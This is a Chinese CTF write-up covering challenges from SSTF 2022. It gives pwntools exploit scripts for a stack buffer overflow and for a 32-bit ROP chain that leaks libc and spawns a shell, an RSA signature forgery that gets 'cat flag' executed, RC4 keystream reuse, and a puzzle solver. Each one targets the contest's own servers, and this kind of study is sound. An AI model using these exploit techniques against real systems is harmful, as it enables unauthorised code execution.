[SSTF 2022] 三星安全论坛的小比赛错过了
2024-04-03 22:25:55
打开的时候已经比赛完了,不过题目还可以看也可以提交确认正误。有点良心。
前边有个教程
0,签到
这个直接给了flag,一共有690个提交,看来参加的人不多
1,BOF101
一个pwn题,附件给了源码,后边102和103不让作,应该是比赛的时候作了101才让作。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>int printflag(){ char buf[32];FILE* fp = fopen("/flag", "r"); fread(buf, 1, 32, fp);fclose(fp);printf("%s", buf);return 0;
}int main() {int check=0xdeadbeef;char name[140];printf("printflag()'s addr: %p\n", &printflag);printf("What is your name?\n: ");scanf("%s", name); if (check != 0xdeadbeef){printf("[Warning!] BOF detected!\n");exit(0);}return 0;
}
也就是ret2system这个意思,PIE打开加载地址随机但直接给出了加载地址,直接溢出就行,中间注意要恢复check
from pwn import *#p = process('./bof101')
p = remote('bof101.sstf.site', 1337)context(arch='amd64', log_level='debug')p.recvuntil(b's addr: ')printflag = int(p.recvline(), 16)
print(hex(printflag))p.sendlineafter(b"What is your name?\n: ", b'A'*(0x90-4)+p32(0xdeadbeef)+b'A'*8+ p64(printflag+5))
print(p.recv())
p.ineractive()
#SCTF{n0w_U_R_B0F_3xpEr7}
2,RC four
这是一个RC4加密的题,给了一断明文和对应的密文,然后是flag的密文
from Crypto.Cipher import ARC4
from secret import key, flag
from binascii import hexlify#RC4 encrypt function with "key" variable.
def encrypt(data):#check the key is long enoughassert(len(key) > 128)#make RC4 instancecipher = ARC4.new(key)#We don't use the first 1024 bytes from the key stream.#Actually this is not important for this challenge. Just ignore.cipher.encrypt("0"*1024)#encrypt given data, and return it.return cipher.encrypt(data)msg = "RC4 is a Stream Cipher, which is very simple and fast."print (hexlify(encrypt(msg)).decode())
print (hexlify(encrypt(flag)).decode())
#634c3323bd82581d9e5bbfaaeb17212eebfc975b29e3f4452eefc08c09063308a35257f1831d9eb80a583b8e28c6e4d2028df5d53df8
#624c5345afb3494cdd6394bbbf06043ddacad35d28ceed112bb4c8823e45332beb4160dca862d8a80a45649f7a96e9cb
由于用的同一个密码,而流加密是流是相同的,只需要用密文与明文异或得到流,再用这个流去与flag的密文异或就能得到flag
msg = b"RC4 is a Stream Cipher, which is very simple and fast."c1 = bytes.fromhex('634c3323bd82581d9e5bbfaaeb17212eebfc975b29e3f4452eefc08c09063308a35257f1831d9eb80a583b8e28c6e4d2028df5d53df8')
c2 = bytes.fromhex('624c5345afb3494cdd6394bbbf06043ddacad35d28ceed112bb4c8823e45332beb4160dca862d8a80a45649f7a96e9cb')print(bytes([msg[i]^c1[i]^c2[i] for i in range(len(c2))]))#SCTF{B10ck_c1pH3r_4nd_5tr3am_ciPheR_R_5ymm3tr1c}3,RSA101
远程的RSA题,可以加密一些命令,但不参加"cat flag",只要传上"cat flag"的密文就能得到flag
from base64 import b64encode, b64decode
from Crypto.Util.number import getStrongPrime, bytes_to_long, long_to_bytes
from os import systemp = getStrongPrime(512)
q = getStrongPrime(512)
n = p * q
e = 65537
d = pow(e, -1, (p - 1) * (q - 1))print("[RSA parameters]")
print("n =", hex(n))
print("e =", hex(e))def sign(msg):m = bytes_to_long(msg)s = pow(m, d, n)return long_to_bytes(s)def verify(s):s = bytes_to_long(s)v = pow(s, e, n)return long_to_bytes(v)def welcome():print("\nWelcome to command signer/executor.")print("Menu : 1. Verify and run the signed command")print(" 2. Generate a signed command")print(" 3. Base64 encoder")print(" 4. Exit")while True:welcome()sel = input(" > ").strip()if sel == "1":sgn = input("Signed command: ").strip()sgn = b64decode(sgn)cmd = verify(sgn)commands = ["ls -l", "pwd", "id", "cat flag"]if cmd.decode() in commands:system(cmd)else:print("Possible commands: ", commands)elif sel == "2":cmd = input("Base64 encoded command to sign: ")cmd = b64decode(cmd)if cmd == b"cat flag":print("It's forbidden.")else:print("Signed command:", b64encode(sign(cmd)).decode())elif sel == "3":cmd = input("String to encode: ").strip().encode()print("Base64 encoded string:", b64encode(cmd).decode())elif sel == "4":print("bye.")exit()else:print("Invalid selection.")
根据公式 m^e = c mod n有 (m1*m2)^e = c1*c2 mod n这样先求出m1*m2的密文和m2的密文就能还原出m1的密文
n = 0xb2bb275d8fe843e80ce374b0ce029823690f0b54aed519823471b1b25e7c5a88d6f702cac9904601de655fa12ec0387b4ae2b3cd21a9c117694f8c0672fc794cc5839a4fefe75628e37b876b8b3279a0b8eb9c770d44ccd284675dd88f3081ece815825222d0809d56b86563ace017c6053508a0726fc2e0b9e39d77d58e9139
e = 0x10001m1 = 'aWQ=' #id
c1 = 'qe/4qCAGdEaTD3x6FMxdQttRxws+4B644++WO2CwgLrLMwH6XVLTptKPB11rV05k2ptP2eg95ya2RFlX+Ai+xAlueUIwpGJv7aJmAWM2ql3QOFHfWrM2Ug3gOG/ZrMCFllJf6TSFbIatPkM8QPDuxJguHP76bJ9LbX/tC2h0QBA='m2 = 'KOnKsqaqdklLPA==' # id * cat flag
c2 = 'IrXRx0ClBV7YBkoHRYgaJvC2790qJezvRRHAqZR9Q/Zac33N+SKImnBldBmRaqJxiSdBv0nw5pTuVBr7pEafsnPX8cBossw02LqAbyRGdfPEk+CavU5MHfeOX1UeE7dt28jUDvsKQRkEwX2RL5bhV1o1gJxJGytjBjFqQ9mp9ho='from base64 import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
from gmpy2 import invertc1 = bytes_to_long(b64decode(c1))
c2 = bytes_to_long(b64decode(c2))c = (invert(c1, n)*c2) %n
print(c)
bc = b64encode(long_to_bytes(c))
print(bc)#o5O43WLT5/JFn9daBKXdnaaS75QRTEvRZCZLvkR5aleB2PENwBw5YNDYZRxdytIsvnBqjQ3Zp/g7Fokj4GRVL93XlsgpUAcVMqrT1ssQq1WqL+mQDn5n2yggU2qAwPq7r02eEf2GzlY1+KJTmEF3jU8/K40SccJA3RKsZOQZN98=
#SCTF{Mult1pLic4tiv3_pr0perty_of_RSA}
'''
shi@ubuntu:~/2022sstf/bol$ nc rsa101.sstf.site 1104
[RSA parameters]
n = 0xb2bb275d8fe843e80ce374b0ce029823690f0b54aed519823471b1b25e7c5a88d6f702cac9904601de655fa12ec0387b4ae2b3cd21a9c117694f8c0672fc794cc5839a4fefe75628e37b876b8b3279a0b8eb9c770d44ccd284675dd88f3081ece815825222d0809d56b86563ace017c6053508a0726fc2e0b9e39d77d58e9139
e = 0x10001Welcome to command signer/executor.
Menu : 1. Verify and run the signed command2. Generate a signed command3. Base64 encoder4. Exit> 2
Base64 encoded command to sign: aWQ=
Signed command: qe/4qCAGdEaTD3x6FMxdQttRxws+4B644++WO2CwgLrLMwH6XVLTptKPB11rV05k2ptP2eg95ya2RFlX+Ai+xAlueUIwpGJv7aJmAWM2ql3QOFHfWrM2Ug3gOG/ZrMCFllJf6TSFbIatPkM8QPDuxJguHP76bJ9LbX/tC2h0QBA=Welcome to command signer/executor.
Menu : 1. Verify and run the signed command2. Generate a signed command3. Base64 encoder4. Exit> 2
Base64 encoded command to sign: KOnKsqaqdklLPA==
Signed command: IrXRx0ClBV7YBkoHRYgaJvC2790qJezvRRHAqZR9Q/Zac33N+SKImnBldBmRaqJxiSdBv0nw5pTuVBr7pEafsnPX8cBossw02LqAbyRGdfPEk+CavU5MHfeOX1UeE7dt28jUDvsKQRkEwX2RL5bhV1o1gJxJGytjBjFqQ9mp9ho=Welcome to command signer/executor.
Menu : 1. Verify and run the signed command2. Generate a signed command3. Base64 encoder4. Exit> 1
Signed command: o5O43WLT5/JFn9daBKXdnaaS75QRTEvRZCZLvkR5aleB2PENwBw5YNDYZRxdytIsvnBqjQ3Zp/g7Fokj4GRVL93XlsgpUAcVMqrT1ssQq1WqL+mQDn5n2yggU2qAwPq7r02eEf2GzlY1+KJTmEF3jU8/K40SccJA3RKsZOQZN98=
SCTF{Mult1pLic4tiv3_pr0perty_of_RSA}
'''4, DocxAchive
这是个word文档,里边有个嵌入文件,先把扩展名改为zip然后解开能得到oleObject1.bin这个文件也不知道怎么打开,先用010打开看看发现有个PNG文件头,将这一块复制出来。打开里边就是个flag
5, PPPR
一开始以为一定要用PPPR感觉很麻烦,打开后看就是一个栈溢出题,先puts(got.puts)再回到main(由于这里边没有/bin/sh所以要用libc里的bin/sh才用到libc,原题原意可能是用pppr直接用输入的串,因为system已经给出了),然后在得到libc后再作system(bin/sh)
from pwn import *elf = ELF('./pppr')
context(arch='i386', log_level='debug')#p = process('./pppr')
p = remote('pppr.sstf.site', 1337)#gdb.attach(p, "b*0x80485b2")
#pause()bss = 0x804a100
pay = flat(b'A'*8,0, elf.plt['puts'],elf.sym['main'],elf.got['puts'])p.sendline(pay)
libc_base = u32(p.recv(4)) - 0x6d1e0 #local 0x6dc30
bin_sh = libc_base + 0x18b363 #0x18e363print('libc:', hex(libc_base))pay = flat(b'A'*8,0, elf.plt['system'],0, bin_sh)
p.sendline(pay)p.interactive()
#SCTF{Anc13nt_x86_R0P_5kiLl}
6,Flip Puzzle
这是一个4阶拼版游戏,复原4*4块的位置。由于是计算机上的虚拟,这个没有上下左右边界,可以在左边界左移到最右。另外这里没有空格,是用与A互换实现的,实际上完全一样把A当空格就行了。
#!/usr/bin/env python3import random
import os
import signal
import sysLIMIT_TIME = 50
NUM_STAGE = 100
SHUFFLE_NUM = 11def bye():print ("Bye~")sys.exit()signal.signal(signal.SIGALRM, bye)
signal.alarm(LIMIT_TIME)class Challenge:goal = "A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P"status = "A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P"xpos = 0ypos = 0dist = 0def init(self):self.status = self.goaldef shuffle(self, num):options = [(0, +1), (0, -1), (+1, 0), (-1, 0)]for _ in range(num):dx, dy = random.choice(options)self.move(dx, dy)def move(self, dx, dy):assert abs(dx + dy) == 1assert dx == 0 or dy == 0arr = self.status.split(",")p1 = self.xpos * 4 + self.yposxxpos = (self.xpos + dx + 4) % 4yypos = (self.ypos + dy + 4) % 4p2 = xxpos * 4 + yyposarr[p1], arr[p2] = arr[p2], arr[p1]self.xpos = xxposself.ypos = yyposself.status = ",".join(arr)def ok(self):return self.goal == self.statusdef dump(self):arr = self.status.split(",")for i in range(0, 4):print ("".join(arr[i*4:i*4+4]))for _ in range(NUM_STAGE):chall = Challenge()chall.shuffle(SHUFFLE_NUM)cnt = 0print("Current Status :")chall.dump()while chall.ok() == False:try:dx, dy = map(int, input(">>>").split(","))chall.move(dx, dy)cnt = cnt + 1if cnt > SHUFFLE_NUM:bye()except:bye()print ("Solved!")print("SCTF{fake-flag}")由于需要成功100次才行,所以不能在线解题,要先生成个库,也就是11步所能走到的所有情况。这个用分层遍历来实现。由于要走11步,所以这个运行花费大量时间,估计这也是题目完成人少的原因
def move(status, dx, dy):arr = status.split(",")p1 = arr.index('A')p1x = p1 // 4p1y = p1 % 4 p2x = (p1x+dx)%4p2y = (p1y+dy)%4 p2 = p2x*4 + p2y arr[p1], arr[p2] = arr[p2], arr[p1]return ",".join(arr) goal = "A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P"
options = [[0, +1], [0, -1], [+1, 0], [-1, 0]]
SHUFFLE_NUM = 11
a_m = []
a_s = []
def get_s(m, t, s):global a_m,a_s if t in a_m:return a_s[a_m.index(t)]a_m = [m]a_s = [s]start = 0end = len(a_m)for _ in range(SHUFFLE_NUM):print(_)newstate = {}for j in range(start, end):for i in range(4):ns = move(a_m[j], options[i][0], options[i][1])if ns not in a_m:a_m.append(ns)a_s.append(a_s[j]+str(i))start = end end = len(a_m)get_s(goal,goal, '') #取得所有状态
print(len(a_m), a_m[:10], a_s[:10])open('a_m.dat', 'w').write("\n".join(a_m))
open('a_s.dat', 'w').write("\n".join(a_s))生成了一个10M的库,和所走的最短路径,然后再连线查表返回步数
a_m = []
with open("a_m.dat") as f:for i in range(324747):a_m.append(f.readline().strip('\n'))
a_s = []
with open("a_s.dat") as f:for i in range(324747):a_s.append(f.readline().strip('\n'))print(len(a_m), len(a_s))op_r = [[0, -1], [0, 1], [-1, 0], [1, 0]]
print(op_r[0][0])
from pwn import *#context(arch='amd64', log_level= 'debug')
p = remote("flippuzzle.sstf.site", 8098)
#p = process(["d:/python/python","app.py"])
NUM_STAGE = 100
for i in range(NUM_STAGE):print(i, end='')p.recvuntil(b"Current Status :\n")old_status = p.recvuntil(b'>>>', drop=True).replace(b'\n', b'').decode()old_status = ",".join(list(old_status))print('old:', old_status)ok = a_s[a_m.index(old_status)][::-1]for i in ok:i = int(i)r = op_r[i]p.sendline(str(r[0]) +","+str( r[1]))print(p.recvline())
print(p.recvline())
#SCTF{what-is-your-favorite-algorithm_0x38dc129?}
[SSTF 2022] 三星安全论坛的小比赛错过了相关推荐
- 2022创新中国企业家论坛暨天心集团六周年年会成功举行
2022年1月18-19日,由中小企业商业模式研究中心指导,天心集团.微好秘科技主办,国赛之光.永和资本.大龙火锅协办的第十三届创新中国企业家论坛暨天心集团六周年年会成功举行. 2022创新中国企业家 ...
- 多款C系列手机亮相三星中国论坛,更加注重中国用户体验
每年的三星中国论坛都会集中进行全产品的集体亮相,中国作为三星在全球的重要市场也在每年的名单之内.2017年3月2日,2017三星中国论坛在上海正式拉开了序幕,三星电子全线产品均参与了本次展会,其中消费 ...
- 2022年的几个小目标
2022年的几个小目标 1, 希望能在苏州做一个长期SAP项目. 只要是在苏州,任何项目都可以,最好是4月份开始能在苏州做项目到年底甚至更长时间.不管是global rollout,还是加班无底线无节 ...
- 爬虫大作业_爬取三星Galaxy_S9论坛
1.选一个自己感兴趣的主题或网站.(所有同学不能雷同) 2.用python 编写爬虫程序,从网络上爬取相关主题的数据. 3.对爬了的数据进行文本分析,生成词云. 4.对文本分析结果进行解释说明. 5. ...
- 微信论坛交流小程序系统毕业设计毕设(8)毕业设计论文模板
整个项目包含了:开题报告 + 开题报告PPT + 任务书 + 中期报告 + 论文模板 + 答辩PPT等 + 项目源码 主要安介绍了系统在开发过程中所应用到的一些关键的技术,主要包括了前端小程序开发的M ...
- 微信论坛交流小程序系统毕业设计毕设(4)开题报告
整个项目包含了:开题报告 + 开题报告PPT + 任务书 + 中期报告 + 论文模板 + 答辩PPT等 + 项目源码 主要安介绍了系统在开发过程中所应用到的一些关键的技术,主要包括了前端小程序开发的M ...
- 微信论坛交流小程序系统毕业设计毕设(6)开题答辩PPT
整个项目包含了:开题报告 + 开题报告PPT + 任务书 + 中期报告 + 论文模板 + 答辩PPT等 + 项目源码 主要安介绍了系统在开发过程中所应用到的一些关键的技术,主要包括了前端小程序开发的M ...
- 2022最新微信表白墙小程序源码+美观好看
正文: 2022全新微信表白墙小程序源码,项目使用的LeanCloud作为后端云,其它的就没什么好介绍的了. 程序: wwejgr.lanzouh.com/iD5530hcxf1e 图片:
- 全新的三星开发者论坛
韩国首尔 - 2011年1月27日 - 三星电子作为移动设备提供领域的领军者,在1月27日正式开放了- "三星开发者论坛",您可以通过下面的URL进行访问:http://devel ...
最新文章
- 企业中如何避免因网卡硬件问题产生的损失
- 关于微软Silverlight,你应该知道的10件事
- 利用python脚本(re)抓取美空mm图片
- [洛谷P4918]信仰收集
- java将date类型转成yyyymmdd_java中的Date怎么转换成YYYYMMDD形式?
- C/C++工程师需要掌握哪些技能?他们的工资这么高,是有原因的!
- js iframe 出现跨越问题
- Python使用PyQT制作视频播放器
- 将Long类型的数通过UDP传输
- Tomcat—logs文件夹中不再产生日志文件
- Git(4):远程仓库
- 一键搞定JavaEE应用, JRE + Tomcat + Mysql - JaveEE绿色运行环境JTM0.9版,将web变得像桌面应用一样简单.
- web player php,unity web player是什么软件
- Java 标准计算器(使用SWT做界面)
- python实现图片嗅探工具——自编driftnet
- 一款很漂亮的一天只弹窗一次的公告
- WORD中图片叠加背景融合的方法
- mysql execute 方法_MyEclipse------execute()使用方法
- OneNET麒麟座应用开发之四:数据上传测试
- Apollo学习笔记1-ESD_CAN调试